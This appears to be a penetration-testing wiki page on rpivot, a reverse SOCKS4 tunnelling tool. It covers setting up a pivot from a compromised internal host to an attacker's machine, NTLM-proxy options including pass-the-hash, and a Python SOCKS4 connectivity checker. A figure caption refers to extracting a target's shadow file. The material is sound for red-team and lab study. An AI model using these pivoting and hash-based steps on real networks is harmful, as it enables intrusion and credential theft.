Rpivot

RPIVOT lets you tunnel traffic into an internal network over SOCKS4. It works like SSH dynamic port forwarding (ssh -D), but in the opposite direction: the rpivot client runs on the internal host and connects out to the rpivot server, and the SOCKS4 listener appears on the server side rather than on the side that opened the connection.

Last updated 2 years ago

Source: https://github.com/klsecservices/rpivot
Requirements

  • Python 2.6/2.7 on both the server host and the client (pivot) host; the tool targets Python 2, so keep a python2 interpreter available on the pivot box

  • Add this line to the /etc/proxychains.conf file on the machine that runs the rpivot server (1080 is the port the server's SOCKS4 listener uses; keep it in sync with --proxy-port if you change it):

    • socks4 127.0.0.1 1080

When to use rpivot?

Imagine this scenario:

  • Machine A and machine B can reach each other (A is the internal target)

  • Machine B can connect out to machine C, the attacker's host

  • Machine C can't connect directly to A

  • So, in this case, we run the rpivot server on C, then run the rpivot client on B and point it at C; the client opens a single outbound TCP connection to the server, which is the "opposite direction" to ssh -D, where the side that initiates the connection is the one that gets the SOCKS listener

  • After that, the SOCKS4 listener on C (port 1080, as in the proxychains line above) relays through B, so any tool on C wrapped in proxychains can access A

A Wireshark capture on B shows all of the traffic riding over the single TCP connection to port 4444 on C, the port we chose for the rpivot server (its --server-port); the individual SOCKS connections to A are multiplexed inside that one stream.

We can also pivot through an NTLM proxy

If the pivot host (B) can only reach the outside through an authenticating NTLM web proxy, start the client with these extra flags so it tunnels to the rpivot server through that proxy:

--ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain DOMAIN.COM --username John --password password

Or, using pass the hash (the NT hash of the account instead of its password):

--ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain DOMAIN.COM --username John --hashes <hash>

Web proxies commonly allow CONNECT only to a few ports such as 443, so if the client cannot get through, run the server on C with --server-port 443 (or another port the proxy permits).
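A quick way to confirm that the pivot really relays to A, whether the client on B reached C directly (scenario above) or through the NTLM proxy (the SOCKS side on C is identical in both cases), is to speak SOCKS4 to the server's listener yourself instead of trusting proxychains, which hooks libc through LD_PRELOAD and therefore misses statically linked or Go tools. The script below is an added example written for this page, not rpivot's own code. It assumes the server was started on C along the lines of `python server.py --server-ip 0.0.0.0 --server-port 4444 --proxy-port 1080` and the client on B with `python client.py --server-ip <C> --server-port 4444` (flag names assumed from rpivot's README usage), so that the SOCKS4 listener is 127.0.0.1:1080 on C; the proxy address and the 10.0.0.5 target used in the usage note are constructed values. The destination must be an IPv4 address: plain SOCKS4 carries no hostname, so resolve names on C first.

```python
"""SOCKS4 smoke test for an rpivot pivot (added example, not part of rpivot)."""
import socket
import struct

# Constructed value for this example: rpivot's SOCKS4 listener on machine C,
# i.e. the same host:port as the proxychains 'socks4 127.0.0.1 1080' line.
PROXY = ("127.0.0.1", 1080)

SOCKS4_VERSION = 0x04
SOCKS4_CMD_CONNECT = 0x01
SOCKS4_GRANTED = 0x5A
# Reply codes from the SOCKS4 protocol description.
SOCKS4_REPLY_TEXT = {
    0x5A: "request granted",
    0x5B: "request rejected or failed",
    0x5C: "rejected: cannot reach identd",
    0x5D: "rejected: identd user mismatch",
}


def build_socks4_connect(dst_ip, dst_port, userid=b""):
    """Encode a SOCKS4 CONNECT request: VN, CD, DSTPORT, DSTIP, USERID, NUL."""
    packed_ip = socket.inet_aton(dst_ip)  # IPv4 only: SOCKS4 has no hostname field
    header = struct.pack("!BBH4s", SOCKS4_VERSION, SOCKS4_CMD_CONNECT, dst_port, packed_ip)
    return header + userid + b"\x00"


def parse_socks4_reply(data):
    """Decode the 8-byte SOCKS4 reply (VN=0, CD, DSTPORT, DSTIP) -> (granted, reason)."""
    if len(data) != 8:
        raise ValueError("short SOCKS4 reply: %r" % (data,))
    vn, cd, _port, _ip = struct.unpack("!BBH4s", data)
    if vn != 0:
        raise ValueError("bad SOCKS4 reply version byte: %d" % vn)
    reason = SOCKS4_REPLY_TEXT.get(cd, "unknown reply code 0x%02x" % cd)
    return cd == SOCKS4_GRANTED, reason


def recv_exact(sock, n):
    """Read exactly n bytes (fewer only if the peer closes the connection)."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def socks4_connect(dst_ip, dst_port, proxy=PROXY, timeout=10.0):
    """Open a TCP connection to dst_ip:dst_port through the SOCKS4 proxy.

    Returns the connected socket, now relayed to the destination, or raises
    ConnectionError carrying the proxy's reason if the pivot refused it."""
    sock = socket.create_connection(proxy, timeout=timeout)
    try:
        sock.sendall(build_socks4_connect(dst_ip, dst_port))
        granted, reason = parse_socks4_reply(recv_exact(sock, 8))
        if not granted:
            raise ConnectionError("SOCKS4 proxy refused %s:%d: %s" % (dst_ip, dst_port, reason))
        return sock
    except Exception:
        sock.close()
        raise


def check_pivot(dst_ip, dst_port, probe=b"", proxy=PROXY):
    """Connect through the pivot and report the first bytes the target sends
    (an SSH or SMTP banner, for instance); returns a one-line OK/FAIL string."""
    try:
        sock = socks4_connect(dst_ip, dst_port, proxy=proxy)
    except OSError as exc:  # covers refused/unreachable proxy and ConnectionError
        return "FAIL: %s" % exc
    with sock:
        if probe:
            sock.sendall(probe)
        try:
            banner = sock.recv(256)
        except socket.timeout:
            banner = b""
    return "OK: %s:%d reachable via pivot, banner=%r" % (dst_ip, dst_port, banner)


if __name__ == "__main__":
    import sys
    print(check_pivot(sys.argv[1], int(sys.argv[2])))
```

Run it on C as `python3 socks4_check.py 10.0.0.5 22`. An OK line carrying an SSH banner means B is relaying to A; a FAIL line that quotes "request rejected or failed" means the listener on C answered but the request was not relayed, typically because B cannot reach that address or the rpivot client is not connected, while a connection-refused FAIL means the rpivot server itself is not listening on the proxy port.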
https://github.com/klsecservices/rpivot
[Figure: diagram of the A / B / C pivot]
[Figure: starting the rpivot server on machine C]
[Figure: connecting the rpivot client on machine B to the server]
[Figure: reaching the third machine, A, through the pivot]
[Figure: extracting the shadow file from the third machine, A]
[Figure: Wireshark results]